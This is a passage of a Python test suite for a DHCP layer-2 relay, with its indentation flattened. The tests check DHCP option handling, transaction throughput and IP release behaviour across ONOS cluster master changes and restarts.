log_test.info('DHCP server is not stopped' )
assert_equal(new_cip,None)
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_after_server_reboot(self, iface = 'veth0'):
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'restart'):
time.sleep(5)
log_test.info('DHCP server is rebooted')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,cip)
else:
log_test.info('DHCP server is not stopped' )
assert_equal(new_cip,None)
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_after_server_stop_start(self, iface = 'veth0'):
self.get_dhcpd_process()
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip, None)
new_cip, new_sip = self.dhcp.only_request(cip, mac)
log_test.info('server rebooting...')
try:
if self.dhcpd_stop(remote_controller = True, dhcpd = 'stop'):
time.sleep(5)
log_test.info('DHCP server is stopped ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip,None)
else:
log_test.info('DHCP server is not stoppped' )
assert_equal(new_cip,None)
self.dhcpd_stop(remote_controller = True, dhcpd = 'start')
log_test.info('DHCP server is started ')
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info('client got same IP after server rebooted, as expected')
finally:
self.dhcpd_stop(remote_controller = True, dhcpd = 'restart')
def test_dhcpl2relay_with_specific_lease_time_in_discover_and_without_in_request_packet(self, iface = 'veth0',lease_time=700):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
self.dhcp.return_option = 'lease'
log_test.info('Sending DHCP discover with lease time of 700')
cip, sip, mac, lval = self.dhcp.only_discover(mac=mac,lease_time = True, lease_value=lease_time)
assert_equal(lval,lease_time)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, lease_time = True)
assert_equal(new_cip,cip)
assert_not_equal(lval, lease_time) #Negative Test Case
log_test.info('client requested lease time in discover packer is not seen in server ACK packet as expected')
def test_dhcpl2relay_with_specific_lease_time_in_request_and_without_in_discover_packet(self, iface = 'veth0',lease_time=800):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, lease_time = True,lease_value=lease_time)
assert_equal(new_cip,cip)
assert_equal(lval, lease_time)
log_test.info('client requested lease time in request packet seen in servre replied ACK packet as expected')
@nottest
def test_dhcpl2relay_with_client_renew_time(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, renew_time = True)
log_test.info('waiting for renew time.. a= %s b= %s c= %s'%(new_cip,new_sip,lval))
time.sleep(lval)
latest_cip, latest_sip = self.dhcp.only_request(new_cip, mac, unicast = True)
assert_equal(latest_cip, cip)
log_test.info('server renewed client IP when client sends request after renew time, as expected')
@nottest
def test_dhcpl2relay_with_client_rebind_time(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, rebind_time = True)
log_test.info('waiting for rebind time..')
time.sleep(lval)
latest_cip, latest_sip = self.dhcp.only_request(new_cip, mac)
assert_equal(latest_cip, cip)
log_test.info('server renewed client IP when client sends request after rebind time, as expected')
def test_dhcpl2relay_with_client_expected_subnet_mask(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_subnet = '255.255.255.0'
self.dhcp.return_option = 'subnet'
cip, sip, mac, subnet_mask = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(subnet_mask,expected_subnet)
log_test.info('subnet mask in server offer packet is same as configured subnet mask in dhcp server')
def test_dhcpl2relay_with_client_sending_dhcp_request_with_wrong_subnet_mask(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'subnet'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Subnet Mask in DHCP Request.")
@nottest
def test_dhcpl2relay_with_client_expected_router_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_router_address = '20.20.20.1'
self.dhcp.return_option = 'router'
cip, sip, mac, router_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_router_address, router_address_value)
log_test.info('router address in server offer packet is same as configured router address in dhcp server')
@nottest
def test_dhcpl2relay_with_client_sends_dhcp_request_with_wrong_router_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'router'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Router Address in DHCP Request.")
def test_dhcpl2relay_with_client_expecting_broadcast_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_broadcast_address = '192.168.1.255'
self.dhcp.return_option = 'broadcast_address'
cip, sip, mac, broadcast_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_broadcast_address, broadcast_address_value)
log_test.info('broadcast address in server offer packet is same as configured broadcast address in dhcp server')
def test_dhcpl2relay_by_client_sending_dhcp_request_with_wrong_broadcast_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'broadcast_address'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Broadcast Address in DHCP Request.")
def test_dhcpl2relay_with_client_expecting_dns_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_dns_address = '192.168.1.1'
self.dhcp.return_option = 'dns'
cip, sip, mac, dns_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_dns_address, dns_address_value)
log_test.info('dns address in server offer packet is same as configured dns address in dhcp server')
def test_dhcpl2relay_by_client_sending_request_with_wrong_dns_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'dns'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong DNS Address in DHCP Request.")
def test_dhcpl2relay_transactions_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc()
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("Final Statistics for total transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of transactions per second: %d", round(self.transactions/self.running_time,0))
def test_dhcpl2relay_consecutive_successes_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(success_rate = True)
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of successful transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful transactions per second: %d", round(self.total_success/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_with_max_clients_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(only_discover = True)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d of sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of clients per second in run %d:%f "
%(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions of sending only DHCP Discover")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of clients per second: %d ",
round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_consecutive_successful_clients_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(success_rate = True, only_discover = True)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d for sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful clients per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful clients per second: %d", round(self.total_success/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_concurrent_transactions_per_second(self, iface = 'veth0'):
for key in (key for key in g_subscriber_port_map if key < 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i):
mac = self.get_mac('veth{}'.format(i))
cip, sip = DHCPTest(iface = 'veth{}'.format(i)).discover(mac = mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
elif cip is None:
self.failure_count += 1
self.lock.notify_all()
self.lock.release()
for i in range (1,4):
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while self.diff <= 60:
t = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(0, random.randrange(1,40,1), 1)})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(42, random.randrange(43,80,1), 1)})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(82, random.randrange(83,120,1), 1)})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(122, random.randrange(123,160,1), 1)})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(162, random.randrange(163,180,1), 1)})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(182, random.randrange(183,196,1), 1)})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d"
%(self.ip_count+self.failure_count,self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of transactions per second: %d", round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_concurrent_consecutive_successes_per_second(self, iface = 'veth0'):
failure_dir = {}
for key in (key for key in g_subscriber_port_map if key != 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i, j):
# log_test.info("Thread Name:%s",current_thread().name)
# failure_dir[current_thread().name] = True
while failure_dir.has_key(current_thread().name) is False:
mac = RandMAC()._fix()
cip, sip = DHCPTest(iface = 'veth{}'.format(i)).discover(mac = mac)
i += 2
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
self.lock.notify_all()
self.lock.release()
elif cip is None:
self.failure_count += 1
failure_dir[current_thread().name] = True
self.lock.notify_all()
self.lock.release()
break
# self.lock.notify_all()
# self.lock.release()
for i in range (1,4):
failure_dir = {}
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while len(failure_dir) != 6:
t = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of successful transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful transactions per second: %d", round(self.total_success/self.running_time,2))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_for_concurrent_clients_per_second(self, iface = 'veth0'):
for key in (key for key in g_subscriber_port_map if key < 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i):
# mac = self.get_mac('veth{}'.format(i))
cip, sip, mac, _ = DHCPTest(iface = 'veth{}'.format(i)).only_discover(mac = RandMAC()._fix())
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
elif cip is None:
self.failure_count += 1
self.lock.notify_all()
self.lock.release()
for i in range (1,4):
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while self.diff <= 60:
t = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(0, random.randrange(1,40,1), 1)})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(42, random.randrange(43,80,1), 1)})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(82, random.randrange(83,120,1), 1)})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(122, random.randrange(123,160,1), 1)})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(162, random.randrange(163,180,1), 1)})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(182, random.randrange(183,196,1), 1)})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d of sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of clients per second in run %d:%f "
%(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions of sending only DHCP Discover")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of clients per second: %d ",
round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_with_client_conflict(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.host_load(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover()
log_test.info('Got dhcp client IP %s from server %s for mac %s.' %
(cip, sip, mac) )
self.dhcp1 = DHCPTest(seed_ip = cip, iface = iface)
new_cip, new_sip, new_mac, _ = self.dhcp1.only_discover(desired = True)
new_cip, new_sip = self.dhcp1.only_request(new_cip, new_mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s.' %
(new_cip, new_sip, new_mac) )
log_test.info("IP %s alredy consumed by mac %s." % (new_cip, new_mac))
log_test.info("Now sending DHCP Request for old DHCP discover.")
new_cip, new_sip = self.dhcp.only_request(cip, mac)
if new_cip is None:
log_test.info('Got dhcp client IP %s from server %s for mac %s.Which is expected behavior.'
%(new_cip, new_sip, new_mac) )
elif new_cip:
log_test.info('Got dhcp client IP %s from server %s for mac %s.Which is not expected behavior as IP %s is already consumed.'
%(new_cip, new_sip, new_mac, new_cip) )
assert_equal(new_cip, None)
##### All cluster scenarios on dhcpl2relay has to validate on voltha-setup from client server.
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_change(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_withdraw_membership(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_restart_cluster(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart()
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
cord_test_onos_shutdown(node = master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_standby_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
cord_test_onos_shutdown(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_adding_two_members_to_cluster(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
cord_test_onos_shutdown(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_restart_cluster_for_10_times(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
for i in range(10):
self.cord_test_onos_restart()
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_on_cluster_with_master_controller_only_restarts(self, iface = 'veth0'):
pass
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
